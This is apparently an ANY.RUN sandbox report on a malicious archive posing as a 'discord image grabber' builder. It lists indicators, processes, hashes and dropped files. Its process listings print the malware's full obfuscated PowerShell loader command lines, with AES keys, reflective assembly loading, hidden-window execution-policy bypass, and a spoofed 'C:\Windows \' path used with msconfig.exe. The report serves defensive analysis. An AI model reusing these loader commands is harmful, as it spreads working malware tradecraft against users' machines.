File name:

discord-image-grabber-main.zip

Full analysis: https://app.any.run/tasks/da2485a1-24c1-4af7-919e-2fa58500acf6
Verdict: Malicious activity
Analysis date: December 23, 2024, 14:12:50
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract, compression method=store
MD5:

E0AEA70DBB3B5FE224F9F5225BB98D53

SHA1:

1A1BC4F4E0BB68C12F748786B4BF77027EF66836

SHA256:

D395B62D4DFD7DB5CB873166AC003CB87CA5ECBEB2FE46D0AE71BBDBEA95D91A

SSDEEP:

98304:LXQ8V2KAP8X7ka/RQaj9Esx8YOuxY8s1PCdlgwmBEZ4Xpofsy9n3e81uIUn7LPpb:wU6ftg2fDZlDgV+WQ1uWZt5TKD05R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 6832)
      • cmd.exe (PID: 7048)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Uses AES cipher (POWERSHELL)

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6428)
      • powershell.exe (PID: 644)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6428)
      • powershell.exe (PID: 644)

    • Changes powershell execution policy (Bypass)

      • builder.bat.exe (PID: 5532)

    • Application was injected by another process

      • dllhost.exe (PID: 6556)
      • dllhost.exe (PID: 5316)
      • dllhost.exe (PID: 1076)

    • Runs injected code in another process

      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Dynamically loads an assembly (POWERSHELL)

      • $sxr-powershell.exe (PID: 6540)

  • SUSPICIOUS

    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 6832)
      • net.exe (PID: 6896)
      • cmd.exe (PID: 7048)
      • net.exe (PID: 7028)
      • cmd.exe (PID: 2972)
      • net.exe (PID: 5640)

    • Process drops legitimate windows executable

      • cmd.exe (PID: 6832)
      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)

    • Cryptography encrypted command line is found

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)
      • $sxr-powershell.exe (PID: 1192)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 6832)
      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)

    • Starts a Microsoft application from unusual location

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 5696)
      • builder.bat.exe (PID: 3584)

    • Reads security settings of Internet Explorer

      • builder.bat.exe (PID: 5696)
      • builder.bat.exe (PID: 5532)
      • $sxr-powershell.exe (PID: 6540)

    • Checks Windows Trust Settings

      • builder.bat.exe (PID: 5696)
      • builder.bat.exe (PID: 5532)
      • $sxr-powershell.exe (PID: 6540)

    • The process bypasses the loading of PowerShell profile settings

      • builder.bat.exe (PID: 5532)

    • The process hide an interactive prompt from the user

      • builder.bat.exe (PID: 5532)

    • Starts POWERSHELL.EXE for commands execution

      • builder.bat.exe (PID: 5532)

    • Starts itself from another location

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)

    • The process hides Powershell's copyright startup banner

      • builder.bat.exe (PID: 5532)

    • Starts CMD.EXE for commands execution

      • msconfig.exe (PID: 6928)
      • cmd.exe (PID: 6904)
      • builder.bat.exe (PID: 5532)

    • Application launched itself

      • cmd.exe (PID: 6904)
      • $sxr-powershell.exe (PID: 6540)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 6904)

    • Executes application which crashes

      • msconfig.exe (PID: 6928)

    • Removes files via Powershell

      • powershell.exe (PID: 644)

    • The process drops C-runtime libraries

      • builder.bat.exe (PID: 3584)

    • Get information on the list of running processes

      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 6832)
      • builder.bat.exe (PID: 5696)
      • cmd.exe (PID: 2972)

    • The process uses the downloaded file

      • WinRAR.exe (PID: 6200)

    • The sample compiled with english language support

      • cmd.exe (PID: 6832)
      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)

    • Reads the machine GUID from the registry

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 5696)
      • $sxr-powershell.exe (PID: 6540)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 1192)

    • Checks supported languages

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 1192)
      • $sxr-powershell.exe (PID: 6540)

    • Reads the computer name

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 5696)
      • $sxr-powershell.exe (PID: 6540)

    • Gets data length (POWERSHELL)

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Uses string split method (POWERSHELL)

      • builder.bat.exe (PID: 5532)
      • builder.bat.exe (PID: 3584)
      • $sxr-powershell.exe (PID: 6540)

    • Checks current location (POWERSHELL)

      • builder.bat.exe (PID: 5696)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 6428)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6428)

    • Reads the software policy settings

      • WerFault.exe (PID: 7036)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2023:06:25 17:55:16
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: discord-image-grabber-main/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
164
Monitored processes
34
Malicious processes
7
Suspicious processes
6

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs cmd.exe conhost.exe no specs net.exe no specs net1.exe no specs builder.bat.exe builder.bat.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs msconfig.exe no specs msconfig.exe no specs msconfig.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs werfault.exe net.exe no specs net1.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs net.exe no specs net1.exe no specs builder.bat.exe dllhost.exe $sxr-powershell.exe dllhost.exe $sxr-powershell.exe no specs dllhost.exe

Process information

PID
CMD
Path
Indicators
Parent process
644"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command "Remove-Item '\\?\C:\Windows \' -Force -Recurse"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exebuilder.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076C:\Windows\System32\dllhost.exe /Processid:{8f14edab-91b8-4d9e-8ab9-81d16f880486}C:\Windows\System32\dllhost.exe
winlogon.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
1192"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6540).WaitForExit();[System.Threading.Thread]::Sleep(5000); function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))C:\Windows\$sxr-powershell.exe$sxr-powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2632"cmd.exe" /c "C:\Windows \System32\msconfig.exe"C:\Windows\System32\cmd.exebuilder.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
2972C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\discord-image-grabber-main\builder.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3564\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3584"builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VsYFF($UqIEP){ $cckBt=[System.Security.Cryptography.Aes]::Create(); $cckBt.Mode=[System.Security.Cryptography.CipherMode]::CBC; $cckBt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $cckBt.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UEGY9MIPrGN+l8HMK+EOWWOHd3i8s5ddQy0gjFJszf0='); $cckBt.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIU6Lrw5kmXrlY9ZdCP5WQ=='); $twFeA=$cckBt.CreateDecryptor(); $return_var=$twFeA.TransformFinalBlock($UqIEP, 0, $UqIEP.Length); $twFeA.Dispose(); $cckBt.Dispose(); $return_var;}function onOdy($UqIEP){ $DcweI=New-Object System.IO.MemoryStream(,$UqIEP); $sUfkw=New-Object System.IO.MemoryStream; $rNOwy=New-Object System.IO.Compression.GZipStream($DcweI, [IO.Compression.CompressionMode]::Decompress); $rNOwy.CopyTo($sUfkw); $rNOwy.Dispose(); $DcweI.Dispose(); $sUfkw.Dispose(); $sUfkw.ToArray();}function spGXl($UqIEP,$ZvarV){ $UbgZg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UqIEP); $oUCsb=$UbgZg.EntryPoint; $oUCsb.Invoke($null, $ZvarV);}$WAkYi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\admin\Desktop\discord-image-grabber-main\builder.bat').Split([Environment]::NewLine);foreach ($kjXpr in $WAkYi) { if ($kjXpr.StartsWith(':: ')) { $vbeRz=$kjXpr.Substring(4); break; }}$IzdcO=[string[]]$vbeRz.Split('\');$clAux=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[0])));$WNxAq=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[1])));spGXl $WNxAq (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));spGXl $clAux (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));C:\Users\admin\Desktop\discord-image-grabber-main\builder.bat.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\discord-image-grabber-main\builder.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3692\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4624\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exebuilder.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5004\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
35 672
Read events
35 638
Write events
28
Delete events
6

Modification events

(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\discord-image-grabber-main.zip
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Comment
Operation:writeName:LeftBorder
Value:
472
(PID) Process:(6200) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
Executable files
7
Suspicious files
9
Text files
36
Unknown types
0

Dropped files

PID
Process
Filename
Type
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\builder.bat
MD5:
SHA256:
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\.editorconfigtext
MD5:34972A6636960201F371FDE437FEEB61
SHA256:AF6D40DEEE9E0A2BF5E5BD9E71F857DCDB5C81D5B453425DA0616F202B4C679B
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\img\footer.pngimage
MD5:A7D50223D0DEDC64C4722572BEEDDC1A
SHA256:372A5A48BC48EC8589372ACFB90F930418B460577958D3AF2A2912ECFAEAF405
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\img\banner.pngimage
MD5:05BC1A72BBA6D3A1E947889816BC5AF9
SHA256:3AEB09BF487D96BD5F273C66BA5EFF9F38AAB0CAA91FD7D5B9C72E624BA8E45A
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\LICENSE.mdtext
MD5:258FBE6A6A66D92F8AEF944EEAA547DF
SHA256:1E5A9CD584CF92FFDC1B1143804FCE7104AD5C5EB71F0BBB1D58452286A1E1A4
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\README.mdhtml
MD5:D0FB36AA0620A552AD251600639B0E3D
SHA256:19732C2C0A1F93EF583EFAA98C3A22916914142E82F36AFA19356ECD3B2DDBB8
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\CONTRIBUTING.mdtext
MD5:E0E6D0734274226C6FA4DF1A423C65F1
